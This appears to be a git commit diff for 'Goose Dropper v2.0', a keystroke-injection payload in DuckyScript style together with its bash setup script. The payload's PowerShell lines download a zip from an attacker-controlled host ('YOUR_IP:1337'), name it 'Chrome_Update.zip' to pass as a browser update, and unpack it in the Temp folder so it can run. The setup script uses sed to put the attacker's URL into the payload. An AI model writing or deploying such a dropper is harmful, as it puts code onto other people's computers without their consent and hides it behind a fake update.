Goose Dropper v2.0 bugfix

This commit is contained in:
Fr3ki
2023-10-31 15:29:10 -06:00
parent 7e089a2556
commit 0723ee2b2e
2 changed files with 3 additions and 3 deletions
+2 -2
View File
@@ -4,12 +4,12 @@ REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and r
DELAY 500
GUI r
DELAY 500
STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
STRING powershell wget YOUR_IP:1337/Chrome_Update.zip -OutFile $ENV:Temp/Update.zip
ENTER
DELAY 8000
GUI r
DELAY 500
STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
ENTER
DELAY 3000
GUI r
+1 -1
View File
@@ -23,7 +23,7 @@ then
read -p "Enter your URL: " SRC
#Add your URL to the payload
sed -i "s/powershell wget YOUR_IP:1337 -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
#Remind users to have the zip ready
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"